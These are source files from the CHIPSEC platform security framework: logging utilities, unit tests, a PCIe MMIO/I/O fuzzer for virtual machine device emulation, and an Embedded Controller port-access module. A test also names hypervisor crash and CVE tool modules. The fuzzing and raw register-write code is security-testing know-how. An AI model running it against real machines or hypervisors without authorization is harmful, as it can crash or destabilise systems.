    def log(self, text: str, level: level = level.INFO, color: Optional[str] = ...) -> None:
        """Sends plain text to logging."""
        self.chipsecLogger.log(level.value, text, color)

    def log_verbose(self, text: str) -> None:  # Use log('text', level.VERBOSE)
        """Logs a Verbose message"""
        self.log(text, level.VERBOSE)

    def log_hal(self, text: str) -> None:  # Use log("text", level.HAL)
        """Logs a hal message"""
        self.log(text, level.HAL)

    def log_helper(self, text: str) -> None:
        """Logs a helper message"""
        self.log(text, level.HELPER)

    def log_debug(self, text: str) -> None:   # Use log("text", level.DEBUG)
        """Logs a debug message"""
        self.log(text, level.DEBUG)

    def set_log_level(self, verbose: bool, hal: bool, debug: bool, vverbose: bool) -> None:
        self.VERBOSE = True if verbose or vverbose else self.VERBOSE
        self.HAL = True if hal or vverbose else self.HAL
        self.DEBUG = True if debug or vverbose else self.DEBUG
        self.setlevel()

    def setlevel(self) -> None:
        if self.DEBUG:
            self.chipsecLogger.setLevel(level.DEBUG.value)
        elif self.HAL:
            self.chipsecLogger.setLevel(level.HAL.value)
        elif self.VERBOSE:
            self.chipsecLogger.setLevel(level.VERBOSE.value)
        else:
            self.chipsecLogger.setLevel(level.INFO.value)

    def create_logs_folder(self):
        if not os.path.exists(self.LOG_PATH):
            try:
                os.mkdir(self.LOG_PATH)
            except (FileExistsError, FileNotFoundError):
                self.log('Unable to create logs folder')
                return False
        return True

    def set_autolog_file(self, prefix: str="") -> None:
        if self.create_logs_folder():
            log_file_name = f'{prefix}{"-" if prefix else ""}{strftime("%Y%b%d-%H%M%S")}.log'
            log_path = os.path.join(self.LOG_PATH, log_file_name)
            file_handler = logging.FileHandler(log_path)
            self.chipsecLogger.addHandler(file_handler)
            file_handler.setFormatter(self.logFormatter)
        else:
            self.log('Unable to autolog')

    def get_terminators(self) -> List[str]:
        terms = []
        for clhandler in self.chipsecLogger.handlers:
            terms.append(clhandler.terminator)
        return terms

    def set_terminators(self, term: str) -> None:
        for clhandler in self.chipsecLogger.handlers:
            clhandler.terminator = term

    def log_inline(self, msg: str) -> None:
        """Logs a plain message without a newline charater at the end"""
        orig_term = self.get_terminators().pop()
        self.set_terminators('')
        self.log(msg)
        self.set_terminators(orig_term)

    def log_csv(self, file_name, test_cases):
        fields = ['name', 'result', 'code', 'output']
        if not file_name.endswith('.csv'):
            file_name = file_name + '.csv'
        with open(file_name, 'w') as csv_file:
            results_csv = csv.DictWriter(csv_file, fieldnames=fields)
            results_csv.writeheader()
            for test_case in test_cases:
                results_csv.writerow(test_case.get_fields())

    def set_log_file(self, name: str, tologpath: bool = True):
        """Sets the log file for the output."""
        # Close current log file if it's opened
        self.disable()

        # specifying empty string (name='') effectively disables logging to file
        if name and self.create_logs_folder():
            if tologpath:
                self.LOG_FILE_NAME = os.path.join(self.LOG_PATH, name)
            else:
                self.LOG_FILE_NAME = name
            # Open new log file and keep it opened
            try:
                # creates FileHandler for log file
                self.logfile = logging.FileHandler(filename=self.LOG_FILE_NAME, mode='a')
            except Exception:
                self.log(f'WARNING: Could not open log file: {self.LOG_FILE_NAME}')
            else:
                self.chipsecLogger.addHandler(self.logfile)
                self.logfile.setFormatter(self.logFormatter)
                self.LOG_TO_FILE = True
                self.chipsecLogger.removeHandler(self.logstream)
        else:
            try:
                self.chipsecLogger.addHandler(self.logstream)
            except Exception:
                pass

    def close(self) -> None:
        """Closes the log file."""
        if self.logfile:
            try:
                self.chipsecLogger.removeHandler(self.logfile)
                self.chipsecLogger.removeHandler(self.logstream)
                self.logfile.close()
                self.logstream.flush()
            except Exception:
                self.log('WARNING: Could not close log file')
            finally:
                self.logfile = None

    def remove_chipsec_logger(self) -> None:
        while self.chipsecLogger.filters:
            self.chipsecLogger.removeFilter(self.chipsecLogger.filters[0])
        while self.chipsecLogger.handlers:
            self.chipsecLogger.removeHandler(self.chipsecLogger.handlers[0])

    def disable(self) -> None:
        """Disables the logging to file and closes the file if any."""
        self.LOG_TO_FILE = False
        self.LOG_FILE_NAME = ''
        self.close()

    def flush(self) -> None:
        sys.stdout.flush()
        if self.LOG_TO_FILE and self.logfile is not None:
            try:
                self.chipsecLogger.removeHandler(self.logfile)
                self.logfile.flush()
                self.chipsecLogger.addHandler(self.logfile)
            except Exception:
                self.disable()

    def set_always_flush(self, val) -> None:
        self.ALWAYS_FLUSH = val

    # -------------------------------------------------------
    # These logger methods are deprecated and will be removed
    # -------------------------------------------------------

    def log_passed(self, text):   # Use log("text", self.logger.GOOD)
        """Logs a passed message."""
        text = f'PASSED: {text}'
        self.log(text, level.GOOD)

    def log_failed(self, text):
        """Logs a failed message."""
        text = f'FAILED: {text}'
        self.log(text, level.BAD)

    def log_error(self, text):   # Use log("text", level.ERROR)
        """Logs an Error message"""
        self.log(text, level.ERROR)

    def log_warning(self, text):   # Use log("text", level.WARNING)
        """Logs an Warning message"""
        self.log(text, level.WARNING)

    def log_not_applicable(self, text):
        """Logs a NOT APPLICABLE message."""
        text = f'NOT APPLICABLE: {text}'
        self.log(text, level.INFO, "YELLOW")

    def log_heading(self, text):
        """Logs a heading message."""
        self.log(text, level.INFO, "BLUE")

    def log_important(self, text):   # Use log("text", level.IMPORTANT)
        """Logs an important message."""
        self.log(text, level.IMPORTANT)

    def log_bad(self, text):   # Use log("text", level.BAD)
        """Logs a bad message, so it calls attention in the information displayed."""
        self.log(text, level.BAD)

    def log_good(self, text):   # Use log("text", level.GOOD)
        """Logs a message, if colors available, displays in green."""
        self.log(text, level.GOOD)

    def log_unknown(self, text):
        """Logs a message with a question mark."""
        text = f'[?] {text}'
        self.log(text)

    def log_information(self, text):    # Use log("text")
        """Logs a message with information message"""
        text = f'[#] INFORMATION: {text}'
        self.log(text)

    # -----------------------------
    # End deprecated logger methods
    # -----------------------------

    def start_test(self, test_name: str) -> None:
        """Logs the start point of a Test"""
        text = '[x][ =======================================================================\n'
        text = f'{text}[x][ Module: {test_name}\n'
        text = f'{text}[x][ ======================================================================='
        self.log(text, level.INFO, 'BLUE')

    VERBOSE: bool = False
    UTIL_TRACE: bool = False
    HAL: bool = False
    DEBUG: bool = False

    LOG_TO_STATUS_FILE: bool = False
    LOG_STATUS_FILE_NAME: str = ''
    LOG_TO_FILE: bool = False
    LOG_FILE_NAME: str = ''


_logger = Logger()


def logger() -> Logger:
    """Returns a Logger instance."""
    return _logger


def aligned_column_spacing(table_data: List[Tuple[str, Dict[str, str]]]) -> Tuple[int, ...]:
    clean_data = clean_data_table(table_data)
    all_column_widths = get_column_widths(clean_data)
    required_widths = find_required_col_widths(all_column_widths)
    return tuple(required_widths)


def clean_data_table(data_table: List[Tuple[str, Dict[str, str]]]) -> List[List[str]]:
    clean_table = [extract_column_values(row) for row in data_table]
    return clean_table


def extract_column_values(row_data: Tuple[str, Dict[str, str]]) -> List[str]:
    clean_row = [row_data[0]]
    additional_column_values = row_data[1].values()
    [clean_row.append(value) for value in additional_column_values]
    return clean_row


def get_column_widths(data: List[List[str]]) -> List[List[int]]:
    col_widths = [[len(col) for col in row] for row in data]
    return col_widths


def find_required_col_widths(col_data: List[List[int]], minimum_width=2) -> List[int]:
    columns_per_row = len(col_data[0])
    max_widths = ([(max(rows[i] for rows in col_data)) for i in range(columns_per_row)])
    for i in range(len(max_widths)):
        max_widths[i] = max_widths[i] if max_widths[i] > minimum_width else minimum_width
    return max_widths

##################################################################################
# Hex dump functions
##################################################################################


def bytes2string(buffer, length=16):
    """Generate text string based on str with ASCII side panel"""
    output = []
    num_string = []
    ascii_string = []
    index = 1
    for c in buffer:
        num_string += [f'{ord(c):02X} ']
        if not (c in string.printable) or (c in string.whitespace):
            ascii_string += [' ']
        else:
            ascii_string += [f'{c}']
        if (index % length) == 0:
            num_string += ['| ']
            num_string += ascii_string
            output.append(''.join(num_string))
            ascii_string = []
            num_string = []
        index += 1
    if 0 != (len(buffer) % length):
        num_string += [(length - len(buffer) % length) * 3 * ' ']
        num_string += ['| ']
        num_string += ascii_string
        output.append(''.join(num_string))
    return '\n'.join(output)


def dump_buffer(arr, length=8):
    """Dumps the buffer (str) with ASCII"""
    return bytes2string(arr, length)


def print_buffer(arr, length=16):
    """Prints the buffer (str) with ASCII"""
    prt_str = bytes2string(arr, length)
    logger().log(prt_str)


def dump_buffer_bytes(arr, length=8):
    """Dumps the buffer (bytes, bytearray) with ASCII"""
    output = []
    num_string = []
    ascii_string = []
    index = 1
    for c in arr:
        num_string += [f'{c:02X} ']
        if not (chr(c) in string.printable) or (chr(c) in string.whitespace):
            ascii_string += [' ']
        else:
            ascii_string += [chr(c)]
        if (index % length) == 0:
            num_string += ['| ']
            num_string += ascii_string
            output.append(''.join(num_string))
            ascii_string = []
            num_string = []
        index += 1
    if 0 != (len(arr) % length):
        num_string += [(length - len(arr) % length) * 3 * ' ']
        num_string += ['| ']
        num_string += ascii_string
        output.append(''.join(num_string))
    return '\n'.join(output)


def print_buffer_bytes(arr, length=16):
    """Prints the buffer (bytes, bytearray) with ASCII"""
    prt_str = dump_buffer_bytes(arr, length)
    logger().log(prt_str)


def pretty_print_hex_buffer(arr, length=16):
    """Prints the buffer (bytes, bytearray) in a grid"""
    _str = ['    _']
    for n in range(length):
        _str += [f'{n:02X}__']
    for n in range(len(arr)):
        if (n % length) == 0:
            _str += [f'\n{n:02X} | ']
        _str += [f'{arr[n]:02X}  ']
    logger().log(''.join(_str))


def dump_data(data, length=16):
    """Dumps the buffer with ASCII"""
    if isinstance(data, str):
        dump_buffer(data, length)
    else:
        dump_buffer_bytes(data, length)


def print_data(data, length=16):
    """Prints the buffer with ASCII"""
    if isinstance(data, str):
        print_buffer(data, length)
    else:
        print_buffer_bytes(data, length)



# CHIPSEC: Platform Security Assessment Framework
# Copyright (c) 2017, Google
# Copyright (c) 2018-2021, Intel Corporation
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; Version 2.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
#
#

import unittest
from unittest.mock import patch

import chipsec_main
from chipsec.testcase import ExitCode
from chipsec.library import module_helper


class TestChipsecMain(unittest.TestCase):
    """Test the main entry point script."""

    def test_help(self):
        """Run chipsec_main --help"""
        # Basic test. This should run without loading the driver.
        m = chipsec_main.main(['--help'])
        self.assertEqual(ExitCode.OK, m)

    def test_module_enumeration(self):
        """Run chipsec_main --enum_tools"""
        module_helper.enumerate_modules()

    def test_read_files_in_tool_folder(self):
        res = module_helper.enumerate_modules()
        expected = ['tools.wsmt', 'tools.cpu.sinkhole', 'tools.secureboot.te', 'tools.smm.rogue_mmio_bar', 'tools.smm.smm_ptr', 'tools.uefi.reputation', 'tools.uefi.s3script_modify', 'tools.uefi.scan_blocked', 'tools.uefi.scan_image', 'tools.uefi.uefivar_fuzz', 'tools.vmm.common', 'tools.vmm.cpuid_fuzz', 'tools.vmm.ept_finder', 'tools.vmm.hypercallfuzz', 'tools.vmm.iofuzz', 'tools.vmm.msr_fuzz', 'tools.vmm.pcie_fuzz', 'tools.vmm.pcie_overlap_fuzz', 'tools.vmm.venom', 'tools.vmm.hv.define', 'tools.vmm.hv.hypercall', 'tools.vmm.hv.hypercallfuzz', 'tools.vmm.hv.synth_dev', 'tools.vmm.hv.synth_kbd', 'tools.vmm.hv.vmbus', 'tools.vmm.hv.vmbusfuzz', 'tools.vmm.vbox.vbox_crash_apicbase', 'tools.vmm.xen.define', 'tools.vmm.xen.hypercall', 'tools.vmm.xen.hypercallfuzz', 'tools.vmm.xen.xsa188']
        for exp in expected:
            self.assertIn(exp, res)

    @patch("chipsec.library.module_helper.logger")
    def test_print_modules_empty_list(self, logger_mock):
        list = []
        module_helper.print_modules(list)
        self.assertTrue(logger_mock().log.called)

    @patch("chipsec.library.module_helper.logger")
    def test_print_modules_one_module(self, logger_mock):
        list = ['common.cpu.cpu_info']
        module_helper.print_modules(list)
        self.assertEqual(logger_mock().log.call_count, len(list) + 1)

    @patch("chipsec_main.print_modules")
    def test_chipsec_main_print_modules(self, print_modules_mock):
        list_module_option = ['-lm']
        chipsec_main.parse_args(list_module_option)
        self.assertTrue(print_modules_mock.called)



# CHIPSEC: Platform Security Assessment Framework
# Copyright (c) 2010-2020, Intel Corporation
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; Version 2.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
#
# Contact information:
# chipsec@intel.com
#


"""
Simple PCIe device Memory-Mapped I/O (MMIO) and I/O ranges VMM emulation fuzzer

Usage:
    ``chipsec_main -m tools.vmm.pcie_fuzz [-a <bus> <dev> <fun>]``

    - ``<bus>`` : Bus # to fuzz (in hex)
    - ``<dev>`` : Device # to fuzz (in hex)
    - ``<fun>`` : Function # to fuzz (in hex)

Where:
    - ``[]``: optional line

Examples:
    >>> chipsec_main.py -i -m tools.vmm.pcie_fuzz
    >>> chipsec_main.py -i -m tools.vmm.pcie_fuzz -l log.txt
    >>> chipsec_main.py -i -m tools.vmm.pcie_fuzz -a 0 1f 0

Additional options set within the module:
    - ``IO_FUZZ``       : Set to fuzz IO BARs
    - ``CALC_BAR_SIZE`` : Set to calculate BAR sizes
    - ``TIMEOUT``       : Timeout between memory writes (seconds)
    - ``ACTIVE_RANGE``  : Set to fuzz MMIO BAR in Active range
    - ``BIT_FLIP``      : Set to fuzz using bit flips
    - ``_EXCLUDE_BAR``  : BARs to exclude (list)

.. note::
    - Returns a Warning by default
    - System may be in an unknown state, further evaluation may be needed

.. important::
    - This module is designed to run in a VM environment
    - Behavior on physical HW is undefined

"""

import time
import random

from chipsec.module_common import BaseModule
from chipsec.library.returncode import ModuleResult
from chipsec.hal.pci import print_pci_devices


#################################################################
# Fuzzing configuration
#################################################################
#
IO_FUZZ = 0
CALC_BAR_SIZE = 1
TIMEOUT = 1
ACTIVE_RANGE = 0
BIT_FLIP = 1

_EXCLUDE_BAR = []


class pcie_fuzz(BaseModule):
    def __init__(self):
        BaseModule.__init__(self)

    def fuzz_io_bar(self, bar, size=0x100):
        port_off = 0
        # Issue 8/16/32-bit I/O requests with various values to all I/O ports (aligned and unaligned)
        for port_off in range(size):
            port_value = self.cs.io.read_port_byte(bar + port_off)
            self.cs.io.write_port_byte(bar + port_off, port_value)
            self.cs.io.write_port_byte(bar + port_off, ~port_value & 0xFF)
            self.cs.io.write_port_byte(bar + port_off, 0xFF)
            self.cs.io.write_port_byte(bar + port_off, 0x00)
            self.cs.io.write_port_word(bar + port_off, 0xFFFF)
            self.cs.io.write_port_word(bar + port_off, 0x0000)
            self.cs.io.write_port_dword(bar + port_off, 0xFFFFFFFF)
            self.cs.io.write_port_dword(bar + port_off, 0x00000000)

    def fuzz_offset(self, bar, reg_off, reg_value, is64bit):
        self.cs.mmio.write_MMIO_reg(bar, reg_off, reg_value)  # same value
        self.cs.mmio.write_MMIO_reg(bar, reg_off, ~reg_value & 0xFFFFFFFF)
        self.cs.mmio.write_MMIO_reg(bar, reg_off, 0xFFFFFFFF)
        self.cs.mmio.write_MMIO_reg(bar, reg_off, 0x5A5A5A5A)
        self.cs.mmio.write_MMIO_reg(bar, reg_off, 0x00000000)

    def fuzz_unaligned(self, bar, reg_off, is64bit):
        dummy = self.cs.mmio.read_MMIO_reg(bar, reg_off + 1)
        # @TODO: crosses the reg boundary
        self.cs.mem.write_physical_mem_word(bar + reg_off + 1, 0xFFFF)
        self.cs.mem.write_physical_mem_byte(bar + reg_off + 1, 0xFF)

    def fuzz_mmio_bar(self, bar, is64bit, size=0x1000):
        self.logger.log(f'[*] Fuzzing MMIO BAR 0x{bar:016X}, size = 0x{size:X}..')
        reg_off = 0
        # Issue aligned 32-bit MMIO requests with various values to all MMIO registers
        for reg_off in range(0, size, 4):
            reg_value = self.cs.mmio.read_MMIO_reg(bar, reg_off)
            self.fuzz_offset(bar, reg_off, reg_value, is64bit)
            self.fuzz_unaligned(bar, reg_off, is64bit)
            # restore the original value
            self.cs.mmio.write_MMIO_reg(bar, reg_off, reg_value)

    def fuzz_mmio_bar_random(self, bar, is64bit, size=0x1000):
        self.logger.log(f'[*] Fuzzing MMIO BAR in random mode 0x{bar:016X}, size = 0x{size:X}..')
        reg_off = 0
        while 1:
            rand = random.randint(0, size / 4 - 1)
            self.fuzz_offset(bar, reg_off, rand * 4, is64bit)
            self.fuzz_offset(bar, reg_off, rand * 4 + 1, is64bit)
            self.fuzz_unaligned(bar, rand * 4, is64bit)

    def fuzz_mmio_bar_in_active_range(self, bar, is64bit, list):
        self.logger.log(f'[*] Fuzzing MMIO BAR in Active range 0x{bar:016X}, size of range = 0x{len(list):X}..')
        for reg_off in list:
            rand = random.randint(0, 255)
            self.fuzz_offset(bar, reg_off, rand, is64bit)
            self.fuzz_unaligned(bar, reg_off, is64bit)

    def fuzz_mmio_bar_in_active_range_random(self, bar, is64bit, list):
        self.logger.log(f'[*] Fuzzing MMIO BAR in Active range 0x{bar:016X} in random mode, size of range = 0x{len(list):X}..')
        reg_off = 0
        self.fuzz_unaligned(bar, reg_off, is64bit)
        while 1:
            rand = random.randint(0, len(list) - 1)
            self.fuzz_offset(bar, reg_off, list[rand], is64bit)

    def fuzz_mmio_bar_in_active_range_bit_flip(self, bar, is64bit, list):
        self.logger.log(f'[*] Fuzzing (bit flipping) MMIO BAR in Active range 0x{bar:016X}, size of range = 0x{len(list):X}..')
        reg_off = 0
        while 1:
            rand_index = random.randint(0, len(list) - 1)
            reg_value = self.cs.mmio.read_MMIO_reg(bar, list[rand_index])

            rand_offset = random.randint(0, 32)
            if (1 << rand_offset) & reg_value:
                reg_value = ~(1 << rand_offset) & 0xffffffff & reg_value
            else:
                reg_value = reg_value | (1 << rand_offset)

            self.cs.mmio.write_MMIO_reg(bar, reg_off, reg_value)

    def find_active_range(self, bar, size):
        self.logger.log(f'[*] Determine MMIO BAR Active range 0x{bar:016X}, size  0x{size:X}..')
        one = self.cs.mem.read_physical_mem(bar, size)
        time.sleep(TIMEOUT)
        two = self.cs.mem.read_physical_mem(bar, size)
        diff_index = []
        for i in range(len(one) // 4 - 1):
            j = 4 * i
            if (one[j] != two[j]) or (one[j + 1] != two[j + 1]) or (one[j + 2] != two[j + 2]) or (one[j + 3] != two[j + 3]):
                diff_index.append(j)
        return diff_index

    def fuzz_pcie_device(self, b, d, f):
        self.logger.log('[*] Discovering MMIO and I/O BARs of the device..')
        device_bars = self.cs.pci.get_device_bars(b, d, f, bCalcSize=CALC_BAR_SIZE)
        for (bar, isMMIO, is64bit, bar_off, bar_reg, size) in device_bars:
            if bar not in _EXCLUDE_BAR:
                # Fuzzing MMIO registers of the PCIe device
                if isMMIO:
                    self.logger.log(f'[*] + 0x{bar_off:02X} ({bar_reg:X}): MMIO BAR at 0x{bar:016X} (64-bit? {is64bit:d}) with size: 0x{size:08X}. Fuzzing..')
                    if ACTIVE_RANGE and (size > 0x1000):
                        list = []
                        list = self.find_active_range(bar, size)
                        if len(list) > 0:
                            if BIT_FLIP:
                                self.fuzz_mmio_bar_in_active_range_bit_flip(bar, is64bit, list)
                            else:
                                self.fuzz_mmio_bar_in_active_range(bar, is64bit, list)
                    else:
                        if size >= 0x2000000:
                            size = 0x2000000
                        self.fuzz_mmio_bar(bar, is64bit, size)
                # Fuzzing I/O registers of the PCIe device
                else:
                    if IO_FUZZ:
                        self.logger.log('[*] + 0x{bar_off:02X}: I/O BAR at 0x{bar:08X}. Fuzzing..')
                        self.fuzz_io_bar(bar)

    def run(self, module_argv):
        self.logger.start_test('PCIe device fuzzer (pass-through devices)')

        pcie_devices = []
        if len(module_argv) > 2:
            _bus = int(module_argv[0], 16)
            _dev = int(module_argv[1], 16)
            _fun = int(module_argv[2], 16)
            pcie_devices.append((_bus, _dev, _fun, 0, 0, 0))
        else:
            self.logger.log('[*] Enumerating available PCIe devices..')
            pcie_devices = self.cs.pci.enumerate_devices()

        self.logger.log('[*] About to fuzz the following PCIe devices..')
        print_pci_devices(pcie_devices)

        for (b, d, f, _, _, _) in pcie_devices:
            self.logger.log(f'[+] Fuzzing device {b:02X}:{d:02X}.{f:X}')
            self.fuzz_pcie_device(b, d, f)

        self.logger.log_information('Module completed')
        self.logger.log_warning('System may be in an unknown state, further evaluation may be needed.')
        self.result.setStatusBit(self.result.status.VERIFY)
        self.res = self.result.getReturnCode(ModuleResult.WARNING)
        return self.res



# CHIPSEC: Platform Security Assessment Framework
# Copyright (c) 2010-2021, Intel Corporation
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; Version 2.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
#
# Contact information:
# chipsec@intel.com
#


# -------------------------------------------------------------------------------
#
# CHIPSEC: Platform Hardware Security Assessment Framework
#
# -------------------------------------------------------------------------------

"""
Access to Embedded Controller (EC)

Usage:

    >>> write_command( command )
    >>> write_data( data )
    >>> read_data()
    >>> read_memory( offset )
    >>> write_memory( offset, data )
    >>> read_memory_extended( word_offset )
    >>> write_memory_extended( word_offset, data )
    >>> read_range( start_offset, size )
    >>> write_range( start_offset, buffer )

"""
from typing import Optional
from chipsec.hal import hal_base
from chipsec.library.logger import print_buffer_bytes

#
# Embedded Controller ACPI ports
#
IO_PORT_EC_DATA = 0x62
IO_PORT_EC_COMMAND = 0x66
IO_PORT_EC_STATUS = 0x66

IO_PORT_EC_INDEX = 0x380
IO_PORT_EC_INDEX_ADDRH = (IO_PORT_EC_INDEX + 0x1)
IO_PORT_EC_INDEX_ADDRL = (IO_PORT_EC_INDEX + 0x2)
IO_PORT_EC_INDEX_DATA = (IO_PORT_EC_INDEX + 0x3)


EC_STS_OBF = 0x01  # EC Output buffer full
EC_STS_IBF = 0x02  # EC Input buffer empty


#
# Embedded Controller ACPI commands
# These commands should be submitted to EC ACPI I/O ports
#
EC_COMMAND_ACPI_READ = 0x080  # Read EC ACPI memory
EC_COMMAND_ACPI_WRITE = 0x081  # Write EC ACPI memory
EC_COMMAND_ACPI_LOCK = 0x082  # Lock EC for burst use
EC_COMMAND_ACPI_UNLOCK = 0x083  # Unlock EC from burst use
EC_COMMAND_ACPI_QUERY = 0x084  # Query EC event
EC_COMMAND_ACPI_READ_EXT = 0x0F0  # Read EC ACPI extended memory
EC_COMMAND_ACPI_WRITE_EXT = 0x0F1  # Write EC ACPI extended memory


class EC(hal_base.HALBase):

    #
    # EC ACPI memory access
    #

    # Wait for EC input buffer empty
    def _wait_ec_inbuf_empty(self) -> bool:
        to = 1000
        while (self.cs.io.read_port_byte(IO_PORT_EC_STATUS) & EC_STS_IBF) and to:
            to = to - 1
        return True

    # Wait for EC output buffer full
    def _wait_ec_outbuf_full(self) -> bool:
        to = 1000
        while not (self.cs.io.read_port_byte(IO_PORT_EC_STATUS) & EC_STS_OBF) and to:
            to = to - 1
        return True

    def write_command(self, command: int) -> None:
        self._wait_ec_inbuf_empty()
        return self.cs.io.write_port_byte(IO_PORT_EC_COMMAND, command)

    def write_data(self, data: int) -> None:
        self._wait_ec_inbuf_empty()
        return self.cs.io.write_port_byte(IO_PORT_EC_DATA, data)

    def read_data(self) -> Optional[int]:
        if not self._wait_ec_outbuf_full():
            return None
        return self.cs.io.read_port_byte(IO_PORT_EC_DATA)

    def read_memory(self, offset: int) -> Optional[int]:
        self.write_command(EC_COMMAND_ACPI_READ)
        self.write_data(offset)
        return self.read_data()

    def write_memory(self, offset: int, data: int) -> None:
        self.write_command(EC_COMMAND_ACPI_WRITE)
        self.write_data(offset)
        return self.write_data(data)

    def read_memory_extended(self, word_offset: int) -> Optional[int]:
        self.write_command(EC_COMMAND_ACPI_READ)
        self.write_data(0x2)
        self.write_data(word_offset & 0xFF)
        self.write_command(EC_COMMAND_ACPI_READ_EXT)
        self.write_data(word_offset >> 8)
        return self.read_data()

    def write_memory_extended(self, word_offset: int, data: int) -> None:
        self.write_command(EC_COMMAND_ACPI_WRITE)
        self.write_data(0x2)
        self.write_data(word_offset & 0xFF)
        self.write_command(EC_COMMAND_ACPI_WRITE_EXT)
        self.write_data(word_offset >> 8)
        return self.write_data(data)

    def read_range(self, start_offset: int, size: int) -> bytes:
        buffer = [0xFF] * size
        for i in range(size):
            if start_offset + i < 0x100:
                mem_value = self.read_memory(start_offset + i)
                if mem_value is not None:
                    buffer[i] = mem_value
                else:
                    self.logger.log_hal(f'[ec] Unable to read EC offset 0x{start_offset + i:X}')
            else:
                mem_value = self.read_memory_extended(start_offset + i)
                if mem_value is not None:
                    buffer[i] = mem_value
                else:
                    self.logger.log_hal(f'[ec] Unable to read EC offset 0x{start_offset + i:X}')

        self.logger.log_hal(f'[ec] read EC memory from offset {start_offset:X} size {size:X}:')
        if self.logger.HAL:
            print_buffer_bytes(buffer)
        return bytes(buffer)

    def write_range(self, start_offset: int, buffer: bytes) -> bool:
        for i, b in enumerate(buffer):
            self.write_memory(start_offset + i, b)
        self.logger.log_hal(f'[ec] write EC memory to offset {start_offset:X} size {len(buffer):X}:')
        if self.logger.HAL:
            print_buffer_bytes(buffer)
        return True

    #
    # EC Intex I/O access
    #
    def read_idx(self, offset: int) -> int:
        self.cs.io.write_port_byte(IO_PORT_EC_INDEX_ADDRL, offset & 0xFF)
        self.cs.io.write_port_byte(IO_PORT_EC_INDEX_ADDRH, (offset >> 8) & 0xFF)
        value = self.cs.io.read_port_byte(IO_PORT_EC_INDEX_DATA)
        self.logger.log_hal(f'[ec] index read: offset 0x{offset:02X} > 0x{value:02X}:')
        return value

    def write_idx(self, offset: int, value: int) -> bool:
        self.logger.log_hal(f'[ec] index write: offset 0x{offset:02X} < 0x{value:02X}:')
        self.cs.io.write_port_byte(IO_PORT_EC_INDEX_ADDRL, offset & 0xFF)
        self.cs.io.write_port_byte(IO_PORT_EC_INDEX_ADDRH, (offset >> 8) & 0xFF)
        self.cs.io.write_port_byte(IO_PORT_EC_INDEX_DATA, value & 0xFF)
        return True



# CHIPSEC: Platform Security Assessment Framework
# Copyright (c) 2023, Intel Corporation
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; Version 2.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
#
#


# To execute: python[3] -m unittest tests.helpers.test_linuxhelper

import unittest
from unittest.mock import patch, Mock
from multiprocessing import cpu_count
import sys

from chipsec.library.exceptions import UnimplementedAPIError
from tests.helpers.helper_utils import packer

# assuming 64 bit system. Will break on 32bit system. (would need to swap Q > I in pack())


@patch('chipsec.helper.linux.linuxhelper.fcntl.ioctl')
@patch('chipsec.helper.linux.linuxhelper.fcntl')
class LinuxHelperTest(unittest.TestCase):

    @classmethod
    def setUpClass(cls):
        # Set up mock modules
        cls._mocked_modules = ['fcntl', 'resource', 'pywintypes', 'win32service',
                               'winerror', 'win32file', 'win32api', 'win32process',
                               'win32security', 'win32serviceutil']
        for mod in cls._mocked_modules:
            sys.modules[mod] = Mock()

    @classmethod
    def tearDownClass(cls):
        # remove mocked modules
        for mod in cls._mocked_modules:
            del sys.modules[mod]
    cpacker = packer()
    ioctldict = {
        (0xc0084301, b'\xb8\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'):
            cpacker.pack_ioport(0x1),
        (0xc0084302, b'\xb8\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00U\x00\x00\x00\x00\x00\x00\x00'):
            0x01,
        (0xC0084303, b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'):
            cpacker.pack_pci(0x86),
        (0xC0084303, b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'):
            cpacker.pack_pci(0x8086),
        (0xC0084303, b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'):
            cpacker.pack_pci(0x9A128086),
        (0xC0084303, b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'):
